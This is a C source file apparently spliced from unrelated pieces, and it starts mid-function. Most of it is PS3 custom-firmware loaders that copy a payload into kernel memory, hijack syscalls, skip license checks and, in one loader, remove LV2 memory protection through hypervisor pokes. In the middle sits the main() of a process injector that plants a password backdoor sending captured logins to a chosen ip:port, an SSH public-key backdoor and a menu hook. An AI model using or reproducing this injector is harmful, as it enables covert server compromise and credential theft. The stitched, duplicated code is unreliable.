    /* 0x534B3145 is ASCII "SK1E"; the low half carries the payload offset. */
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (sc8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BD Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //patches by deank for webMAN, I left them here just in case someone wants to play with, but basically the same thing with SYS36 patches below
    /*
    pokeq(0x800000000026D7F4ULL, 0x4E80002038600000ULL ); // fix 8001003C error Original: 0x4E80002038600000ULL // 0x800000000029E528ULL??
    pokeq(0x800000000026D7FCULL, 0x7C6307B44E800020ULL ); // fix 8001003C error Original: 0x7C6307B44E800020ULL // 0x800000000029E530ULL??
    pokeq(0x8000000000059F58ULL, 0x63FF003D60000000ULL ); // fix 8001003D error Original: 0x63FF003D419EFFD4ULL
    pokeq(0x800000000005A01CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error Original: 0x3FE0800163FF003EULL
    pokeq(0x8000000000059FC8ULL, 0x419E00D860000000ULL ); // Original: 0x419E00D8419D00C0ULL
    pokeq(0x8000000000059FD0ULL, 0x2F84000448000098ULL ); // Original: 0x2F840004409C0048ULL //PATCH_JUMP
    pokeq(0x800000000005E0ACULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL
    pokeq(0x800000000005E0C0ULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL
    */

    pokeq(0x8000000000059BFCULL, 0x386000012F830000ULL ); // Ignore LIC.DAT check <- DO NOT REMOVE
    pokeq(0x800000000022DAC8ULL, 0x38600000F8690000ULL ); // fix 0x8001002B / 80010017 errors (ported for DEX 4.70 2015-03-03)

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x59FCC, 0x60000000);
    PATCH_JUMP(0x59FD4, 0x5A06C);
    _poke32(0x5E0B0, 0x60000000);
    _poke32(0x5E0C4, 0x60000000);
    _poke( 0x59F58, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x5A020, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"

    // Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates
    _poke(0x26D7F8, 0x386000007C6307B4);
    _poke32(0x26D7F8 + 8, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    PATCH_JUMP(0x2B24A4, (PAYLOAD_OFFSET+0x30)); // patch openhook
    // _poke32(0x2B2480, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98")

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * Loader for CFW 4.31 (older payload layout: openhook at +0xF0, sys8
 * descriptor at +0x398, sys36 descriptor at +0xC8, perms hook at +0x2a8).
 *
 * Points syscalls 9 and 10 at 0x1790/0x1798, installs the temporary LV2
 * memcpy syscall, copies lv1_peek_poke_call_routines to 0x171C and the sky
 * payload to PAYLOAD_OFFSET, removes the memcpy syscall, applies the
 * fixed-address patches and finally redirects syscalls 8 and 36 at the
 * payload.  mode is not read in this body.
 */
void load_payload_431(int mode)
{
    // _poke((u32) (SYSCALL_BASE + 8 * 8) , 0x8000000000001788ULL);
    _poke((u32) (SYSCALL_BASE + 9 * 8) , 0x8000000000001790ULL);
    _poke((u32) (SYSCALL_BASE + 10 * 8), 0x8000000000001798ULL);

    install_lv2_memcpy();

    /* install lv1 peek/poke/call */
    /* Note: 0x800000000000171C has no ULL suffix; it still fits a 64-bit literal. */
    lv2_memcpy(0x800000000000171C, (u64) lv1_peek_poke_call_routines, sizeof(lv1_peek_poke_call_routines));

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_431_bin,
               payload_sky_431_bin_size);

    remove_lv2_memcpy();

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x0571E8, 0x60000000); // already set in E3 "nop"
    PATCH_JUMP(0x0571F0, 0x57288); // already set in E3
    _poke32(0x05ABAC, 0x60000000); // already set in E3 "nop"
    _poke32(0x05ABC0, 0x60000000); // already set in E3 "nop"
    // lv2poke(0x800000000005ABACULL,0x60000000E8610188ULL); different patch method
    // lv2poke(0x800000000005ABA0ULL,0x600000005463063EULL);
    _poke( 0x057174, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x05723C, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x057240, 0x5714C); // fix E3 4.30 added error

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x2979E4, 0x386000007C6307B4);
    _poke32(0x2979EC, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    PATCH_JUMP(0x2C3D04, (PAYLOAD_OFFSET+0xF0)); // patch openhook

    /*
    -0035dc20 80 00 00 00 00 33 bf 88 80 00 00 00 00 33 bf 88 |.....3.......3..|
    +0035dc20 80 00 00 00 00 00 41 28 80 00 00 00 00 33 bf 88 |......A(.....3..|
    -0035dd00 80 00 00 00 00 33 bf 88 80 00 00 00 00 33 bf 88 |.....3.......3..|
    +0035dd00 80 00 00 00 00 00 3e 58 80 00 00 00 00 33 bf 88 |......>X.....3..|
    */
    _poke((u32) (SYSCALL_BASE + 8 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x398)); // syscall_8_desc - sys8
    _poke((u32) (SYSCALL_BASE + 36 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0xC8)); // syscall_map_open_desc - sys36

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x2a8));
#endif
}
/*
 * Entry point of the injector.
 *
 * argv[argc-1] is taken as the target pid; getopt runs over argc-1 arguments
 * so the pid is not parsed as an option.  Options seen in the switch:
 *   -p <key>   public key given inline        -P <file>  public key read from file
 *   -t <ip:port> TCP exfil target             -u <ip:port> UDP exfil target
 *   -c         only log valid logins          -m         install the menu hook
 *   -l <path>  passlog path (case present, but 'l' is not in the getopt string,
 *              so this case is never reached as written)
 * Flow: allocate a zeroed config_block, attach to the pid, locate rexec_flag,
 * map a page near it for the config, install the requested hooks, upload the
 * config block into that page, clear rexec_flag and detach.
 *
 * Returns 0 on success, -1 on usage errors.  error() is treated as fatal by the
 * control flow below (no return after it); that is inferred from usage only.
 */
int main(int argc, char *argv[])
{
    config_block *config;
    char *pubkey_value = NULL;
    char *passlog_path = NULL;
    char *pubkey_file = NULL;
    int net_exfil_type = 0;     /* NOTE(review): never assigned; the TCP/UDP exclusivity check below tests this, while the options set config->net_type */
    int menu_activate = 0;
    int c;

    banner();

    if (argc < 2) {
        usage(argv[0]);
        return -1;
    }

    /* NOTE(review): malloc result is not checked before memset. */
    config = malloc(sizeof(config_block));
    memset(config, 0, sizeof(config_block));

    while((c = getopt(argc-1, argv, "p:P:t:u:mc")) != -1) {
        switch(c) {
            case 'p':
                pubkey_value = optarg;
                break;
            case 'P':
                pubkey_file = optarg;
                break;
            case 't':
                if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port))
                    error("eh, '%s' is not a valid ip:port pair", optarg);
                config->net_type |= NET_EXFIL_TCP;
                break;
            case 'u':
                if (!convert_hostport_pair(optarg, &config->ip_addr, (uint16_t*)&config->port))
                    error("eh, '%s' is not a valid ip:port pair", optarg);
                config->net_type |= NET_EXFIL_UDP;
                break;
            case 'c':
                config->only_log_valid = 1;
                break;
            case 'l':
                passlog_path = optarg;
                break;
            case 'm':
                menu_activate = 1;
                break;
        }
    }

    /* Nothing to install: show usage. */
    if (pubkey_file == NULL && pubkey_value == NULL && passlog_path == NULL && menu_activate == 0) {
        usage(argv[0]);
        return -1;
    }

    /* -p and -P are mutually exclusive. */
    if (pubkey_value != NULL && pubkey_file != NULL) {
        usage(argv[0]);
        return -1;
    }

    if ((net_exfil_type & NET_EXFIL_TCP) && (net_exfil_type & NET_EXFIL_UDP)) {
        error("can only use one net exfiltration method.");
        return -1;
    }

    // allocate inject context
    inject_ctx *ctx = malloc(sizeof(inject_ctx));

    // init inject context
    inject_ctx_init(ctx, atoi(argv[argc-1]));

    // find rexec_flag
    u64 rexec_flag = inject_resolve_rexec(ctx);
    info("rexec_flag\t\t\t= 0x%lx", rexec_flag);

    // install config memory block
    ctx->config_addr = find_hole(ctx, rexec_flag, 0x1000);
    info("allocating config memory @ 0x%lx", ctx->config_addr);

    _mmap( ctx, (void*)ctx->config_addr, 0x1000, PROT_READ| PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, 0, 0 );

    inject_ctx_map_reload(ctx);

    // install backdoor(s)
    if(config->net_type != 0) {
        backdoor_password_install(ctx);
        inject_ctx_map_reload(ctx);
    }

    if (pubkey_value != NULL || pubkey_file != NULL) {
        if (pubkey_file != NULL) {
            FILE *f = fopen(pubkey_file, "rb");
            if (f == NULL) {
                error("could not open pubkey file ('%s')", pubkey_file);
            }

            /* Only the first line of the file is read. */
            char keybuf[2048];
            memset(keybuf, 0, 2048);
            fgets(keybuf, 2047, f);
            fclose(f);

            if(strncmp(keybuf, "ssh-rsa", 7) != 0) {
                error("invalid pubkey specified, we only support ssh-rsa for now");
            }

            /* NOTE(review): unbounded strcpy into config->pubkey; its size is not visible here — confirm it holds 2048 bytes. */
            strcpy(config->pubkey, keybuf);
            backdoor_pubkey_install(ctx);
        } else {
            if(strncmp(pubkey_value, "ssh-rsa", 7) != 0) {
                error("invalid pubkey specified, we only support ssh-rsa for now");
            }

            /* NOTE(review): unbounded strcpy from argv into config->pubkey. */
            strcpy(config->pubkey, pubkey_value);
            backdoor_pubkey_install(ctx);
        }

        inject_ctx_map_reload(ctx);
    }

    if (menu_activate) {
        backdoor_menu_install(ctx);
        inject_ctx_map_reload(ctx);
    }

    mod_banner("finishing install");

    // upload config data
    info("uploading config..");
    _poke(ctx->pid, ctx->config_addr, config, sizeof(config_block));

    // disable rexec
    info("switching off rexec..");
    u32 null_word = 0;
    _poke(ctx->pid, rexec_flag, &null_word, 4);

    // clean up
    inject_ctx_deinit(ctx);
    callcache_free();

    info("all done!");

    return 0;
}
/*
 * PSGroove-style loader: writes the linked-in payload blob into LV2 and then
 * applies the patch list that is linked in as text.
 *
 * Two copy strategies, chosen at compile time:
 *   USE_MEMCPY_SYSCALL  — install a small copy routine at
 *                         NEW_POKE_SYSCALL_ADDR, invoke it once through
 *                         system_call_3, then restore the original words.
 *   otherwise           — poke the payload 8 bytes at a time, with a 32-bit
 *                         tail write when the size is not a multiple of 8.
 * WITH_PL3 selects the PL3 payload (destination 0x800000000000ef48) over the
 * syscall36 payload (destination 0x80000000002be4a0).
 *
 * The patch text is one entry per line, "ADDR: VALUE" in hex, '#' starts a
 * comment; an 8-hex-digit value is written with _poke32, a 16-digit value
 * with _poke, anything else is skipped.  strtok() and the '#' stripping
 * modify the linked-in text in place, so a second call sees different input.
 * `patches` is only counted, never reported.
 */
void load_payload(void)
{
    char *ptr, *ptr2;
    unsigned long long addr, value;
    int patches = 0;

#ifdef USE_MEMCPY_SYSCALL
    /* This does not work on some PS3s */
    pokeq(NEW_POKE_SYSCALL_ADDR,      0x4800000428250000ULL);
    pokeq(NEW_POKE_SYSCALL_ADDR + 8,  0x4182001438a5ffffULL);
    pokeq(NEW_POKE_SYSCALL_ADDR + 16, 0x7cc428ae7cc329aeULL);
    pokeq(NEW_POKE_SYSCALL_ADDR + 24, 0x4bffffec4e800020ULL);

#ifdef WITH_PL3
    /* NOTE(review): "&&" here is GNU C's address-of-label operator, not two
     * address-of operators; the syscall36 branch below uses a single "&".
     * This line only compiles when both WITH_PL3 and USE_MEMCPY_SYSCALL are
     * set — confirm it was not meant to be "&". */
    system_call_3(NEW_POKE_SYSCALL, 0x800000000000ef48ULL, (unsigned long long) &&_binary_payload_pl3_payload_bin_start, (uint64_t) & _binary_payload_pl3_payload_bin_size);
#else
    system_call_3(new_poke_syscall, 0x80000000002be4a0ULL, (unsigned long long) &_binary_payload_syscall36_payload_bin_start, (uint64_t) & _binary_payload_syscall36_payload_bin_size);
#endif

    /* restore syscall */
    remove_new_poke();
    pokeq(NEW_POKE_SYSCALL_ADDR + 16, 0xebc2fe287c7f1b78);
    pokeq(NEW_POKE_SYSCALL_ADDR + 24, 0x3860032dfba100e8);
#else
    /* WARNING!! It supports only payload with a size multiple of 4 */
    uint32_t i;

#ifdef WITH_PL3
    /* The blob's size is carried as the address of a linker symbol, hence the casts. */
    uint64_t *pl64 = (uint64_t *) (uint64_t) & _binary_payload_pl3_payload_bin_start;

    for (i = 0; i < (uint64_t) & _binary_payload_pl3_payload_bin_size / sizeof(uint64_t); i++) {
        pokeq(0x800000000000ef48ULL + i * sizeof(uint64_t), *pl64++);
    }

    if ((uint64_t) & _binary_payload_pl3_payload_bin_size % sizeof(uint64_t)) {
        pokeq32(0x800000000000ef48ULL + i * sizeof(uint64_t), (uint32_t) * pl64);
    }
#else
    uint64_t *pl64 = (uint64_t *) (uint64_t) & _binary_payload_syscall36_payload_bin_start;

    for (i = 0; i < (uint64_t) & _binary_payload_syscall36_payload_bin_size / sizeof(uint64_t); i++) {
        pokeq(0x80000000002be4a0ULL + i * sizeof(uint64_t), *pl64++);
    }

    if ((uint64_t) & _binary_payload_syscall36_payload_bin_size % sizeof(uint64_t)) {
        /* NOTE(review): the PL3 branch uses pokeq32 for this 4-byte tail; here
         * the 32-bit value is passed to pokeq, which would write 8 bytes with
         * the value zero-extended — confirm which of the two is intended. */
        pokeq(0x80000000002be4a0ULL + i * sizeof(uint64_t), (uint32_t) * pl64);
    }
#endif
#endif

#ifdef WITH_PL3
    char *tmp = strtok((char *) &_binary_payload_pl3_patch_txt_start, "\n");
#else
    char *tmp = strtok((char *) &_binary_payload_syscall36_patch_txt_start, "\n");
#endif

    do {
        /* Strip a trailing '#' comment in place. */
        ptr = strchr(tmp, '#');
        if (ptr)
            *ptr = 0;

        ptr = tmp;
        while (*ptr == ' ' || *ptr == '\t')
            ptr++;

        /* Note: strchr(set, '\0') matches the terminator, so an empty line passes
         * this test; strtoull then leaves ptr in place and the ':' check skips it. */
        if (!strchr("0123456789abcdefABCDEF", *ptr))
            continue;

        addr = strtoull(ptr, &ptr, 16);

        if (*ptr != ':')
            continue;
        else
            ptr++;

        while (*ptr == ' ' || *ptr == '\t')
            ptr++;

        if (!strchr("0123456789abcdefABCDEF", *ptr))
            continue;

        ptr2 = ptr;
        value = strtoull(ptr, &ptr, 16);
        patches++;

        /* Width of the hex value decides the poke size; other widths are undone. */
        if (ptr - ptr2 == 8) {
            _poke32(addr, value);
        } else if (ptr - ptr2 == 16) {
            _poke(addr, value);
        } else
            patches--;
    } while ((tmp = strtok(NULL, "\n")));
}
/*
 * Loader for CFW 4.31, newer payload layout (openhook at +0x30, sys8
 * descriptor at +0x20, perms hook at +0x18).
 *
 * Sequence: temporary LV2 memcpy syscall, copy lv1_peek_poke_call_routines
 * to 0x171C, the sky payload and the umount routine, save the syscall 8
 * slot in restore_syscall8[], write the "SK1E" id block, copy the TOC into
 * the payload, point syscall 8 at the payload, clear poke_syscall, remove
 * the memcpy syscall, then the webMAN pokeq set, the syscall 9/10 pointers
 * and the fixed-address patches.  The sys36 descriptor write present in the
 * older 4.31 loader is commented out here.  mode is not read in this body.
 */
void load_payload_431(int mode)
{
    install_lv2_memcpy();

    /* install lv1 peek/poke/call */
    lv2_memcpy(0x800000000000171C, (u64) lv1_peek_poke_call_routines, sizeof(lv1_peek_poke_call_routines));

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET,
               (u64) payload_sky_431_bin,
               payload_sky_431_bin_size);
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_431_bin,
               umount_431_bin_size);

    /* Address and current contents of syscall slot 8, presumably for a later restore. */
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2]; // copy the id
    /* 0x534B3145 is ASCII "SK1E"; the low half carries the payload offset. */
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    poke_syscall = 0; // uses sys8_pokeinst

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //Patches from webMAN
    pokeq(0x80000000002979E0ULL, 0x4E80002038600000ULL );
    pokeq(0x80000000002979E8ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error
    pokeq(0x8000000000057174ULL, 0x63FF003D60000000ULL ); // fix 8001003D error
    pokeq(0x800000000005723CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error
    pokeq(0x80000000000571E8ULL, 0x600000002F840004ULL );
    pokeq(0x80000000000571F0ULL, 0x48000098E8629870ULL );
    pokeq(0x800000000005ABACULL, 0x60000000E8610188ULL );
    pokeq(0x800000000005ABA0ULL, 0x600000005463063EULL );

    _poke((u32) (SYSCALL_BASE + 9 * 8) , 0x8000000000001790ULL);
    _poke((u32) (SYSCALL_BASE + 10 * 8), 0x8000000000001798ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    /* Several of these overlap the webMAN pokeq writes above (e.g. 0x57174); they are kept in the original order. */
    _poke32(0x0571E8, 0x60000000); // already set in E3 "nop"
    PATCH_JUMP(0x0571F0, 0x57288); // already set in E3
    _poke32(0x05ABAC, 0x60000000); // already set in E3 "nop"
    _poke32(0x05ABC0, 0x60000000); // already set in E3 "nop"
    // pokeq(0x800000000005ABACULL,0x60000000E8610188ULL); different patch method
    // pokeq(0x800000000005ABA0ULL,0x600000005463063EULL);
    _poke( 0x057174, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x05723C, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x057240, 0x5714C); // fix E3 4.30 added error

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x2979E4, 0x386000007C6307B4);
    _poke32(0x2979EC, 0x4E800020);

    /*
    -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
    +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
    (openhook jump - 0x3E80)
    */
    //0x7C7D1B78
    PATCH_JUMP(0x2C3D04, (PAYLOAD_OFFSET+0x30)); // patch openhook

    // deleted _poke((u32) (SYSCALL_BASE + 36 * 8), 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0xC8)); // syscall_map_open_desc - sys36

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_355 -- install the 3.55 "sky" payload into LV2 kernel memory.
 *
 * Same sequence as the other load_payload_* routines: copy payload + umount
 * routine, save the syscall-8 slot in restore_syscall8[], write the "SK1E" id
 * and descriptor at 0x4f0, copy the kernel TOC into the payload, point
 * syscall 8 at it, then apply the 3.55-specific instruction patches.
 *
 * NOTE(review): the payload is copied to the literal address 0x...ef48 while
 * the id and the TOC/descriptor writes below use PAYLOAD_OFFSET; these must
 * refer to the same location -- confirm PAYLOAD_OFFSET == 0xef48 for this
 * firmware. Addresses are bound to the 3.55 LV2 image; nothing here checks the
 * running version. `mode` is not used in this body.
 */
void load_payload_355(int mode) {
    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x800000000000ef48ULL, (u64) payload_sky_355_bin, payload_sky_355_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_355_bin, umount_355_bin_size);

    // remember the original syscall 8 slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x55f14, 0x60000000);
    _poke32(0x55f1c, 0x48000098);
    _poke32(0x7af68, 0x60000000);
    _poke32(0x7af7c, 0x60000000);
    _poke(0x55EA0, 0x63FF003D60000000); // fix 8001003D error
    _poke(0x55F64, 0x3FE080013BE00000); // fix 8001003E error

    /*
     * -002b3290 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d9 b4 11 |....|.#x|}.xK...|
     * +002b3290 f8 01 00 b0 7c 9c 23 78 4b d5 bf 40 4b d9 b4 11 |....|.#xK..@K...|
     * (openhook jump - 0xF1D8)
     */
    //_poke(0x2b3298, 0x4bd5bda04bd9b411ULL); //jump hook
    PATCH_JUMP(0x2b3298, (PAYLOAD_OFFSET+0x30));

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x28A404, 0x386000007C6307B4);
    _poke32(0x28A40C, 0x4E800020);

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_465 -- install the 4.65 "sky" payload into LV2 kernel memory.
 *
 * Differs from the other load_payload_* routines in three ways:
 *   - the LV1 (hypervisor) writes that disable LV2 memory protection are
 *     gated by bEnableLv2_memprot_patch;
 *   - the webMAN/deank patch set is gated by bEnableLv2_webman_patch and may
 *     reset bEnableLv2_habib_patch to 0;
 *   - the Habib patch set is selected by bEnableLv2_habib_patch (see the
 *     author's legend below).
 * The common part (copy payload + umount routine, save syscall-8 slot in
 * restore_syscall8[], write the "SK1E" id at 0x4f0, copy the TOC, point
 * syscall 8 at the payload) is unchanged.
 *
 * NOTE(review): the legend documents values 0..4, but the code also tests
 * 10 and 11; which values callers actually pass is not visible here.
 * NOTE(review): the webMAN block and the SYS36 block below write overlapping
 * addresses (e.g. 0x5658C, 0x56650, 0x26FDDC/0x26FDE0); the later write wins.
 * All addresses are bound to the 4.65 LV2 image; nothing here checks the
 * running version. `mode` is not used in this body.
 */
void load_payload_465(int mode) {
    if(bEnableLv2_memprot_patch) // changed offset: 0x377828 -> 0x370F28
    {
        //Remove Lv2 memory protection
        // "Original:" values are the pre-patch contents of the four LV1 words
        lv1poke(0x370F28 + 0x00, 0x0000000000000001ULL); // Original: 0x0000000000351FD8ULL
        lv1poke(0x370F28 + 0x08, 0xE0D251B556C59F05ULL); // Original: 0x3B5B965B020AE21AULL
        lv1poke(0x370F28 + 0x10, 0xC232FCAD552C80D7ULL); // Original: 0x7D6F60B118E2E81BULL
        lv1poke(0x370F28 + 0x18, 0x65140CD200000000ULL); // Original: 0x315D8B7700000000ULL
    }

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_465_bin, payload_sky_465_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_465_bin, umount_465_bin_size);

    // remember the original syscall 8 slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BD Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //Patches from webMAN
    if(bEnableLv2_webman_patch)
    {
        //patches by deank
        pokeq(0x800000000026FDDCULL, 0x4E80002038600000ULL ); // fix 8001003C error Original: 0x4E80002038600000ULL
        pokeq(0x800000000026FDE4ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error Original: 0x7C6307B44E800020ULL
        pokeq(0x800000000005658CULL, 0x63FF003D60000000ULL ); // fix 8001003D error Original: 0x63FF003D419EFFD4ULL
        pokeq(0x8000000000056650ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error Original: 0x3FE0800163FF003EULL
        pokeq(0x80000000000565FCULL, 0x419E00D860000000ULL ); // Original: 0x419E00D8419D00C0ULL
        pokeq(0x8000000000056604ULL, 0x2F84000448000098ULL ); // Original: 0x2F840004409C0048ULL //PATCH_JUMP
        pokeq(0x800000000005A658ULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL
        pokeq(0x800000000005A66CULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL
        pokeq(0x8000000000056230ULL, 0x386000012F830000ULL ); // ignore LIC.DAT check
        pokeq(0x80000000002302F0ULL, 0x38600000F8690000ULL ); // fix 0x8001002B / 80010017 errors (2015-01-03)
        pokeq(0x8000000000055C5CULL, 0xF821FE917C0802A6ULL ); // just restore the original
        pokeq(0x8000000000058DB0ULL, 0x419E0038E8610098ULL ); // just restore the original

        /*
        if(file_exists("/dev_flash/rebug")==false || bEnableLv2_webman_patch==3)
        {
            //anti-ode patches by deank
            //pokeq(0x8000000000055C5CULL, 0xF821FE917C0802A6ULL ); //replaced by deank's patch (2015-01-03)
            pokeq(0x8000000000055C84ULL, 0x6000000060000000ULL );
            pokeq(0x8000000000055C8CULL, 0x600000003BA00000ULL );
        }
        */

        // webMAN mode >= 2 (or habib mode 2) disables the Habib patch set below
        if(bEnableLv2_webman_patch>=2 || bEnableLv2_habib_patch == 2) bEnableLv2_habib_patch=0;
    }

    //Patches by Habib ported to 4.65 (habib_patch = 0=disabled, 1=new patch, 2=new patch except 4.65 Habib Cobra, 3=old patch, 4=no boot speedup patch)
    // intentionally empty branch: on a Cobra-based CFW that ships /dev_flash/habib, mode 2 applies nothing
    if(bEnableLv2_habib_patch == 2 && is_cobra_based() && file_exists("/dev_flash/habib")) ;
    else if((bEnableLv2_habib_patch == 11) || (bEnableLv2_habib_patch == 2))
    {
        // enable new habib patches (now obsolete)
        //replaced by deank's patch (2015-01-03)
        pokeq(0x8000000000058DB0ULL + 0x00, 0x60000000E8610098ULL);
        pokeq(0x8000000000058DB0ULL + 0x08, 0x2FA30000419E000CULL);
        pokeq(0x8000000000058DB0ULL + 0x10, 0x388000334800BE15ULL);
        pokeq(0x8000000000058DB0ULL + 0x18, 0xE80100F07FE307B4ULL);
        pokeq(0x8000000000055C5CULL + 0x00, 0x386000004E800020ULL);
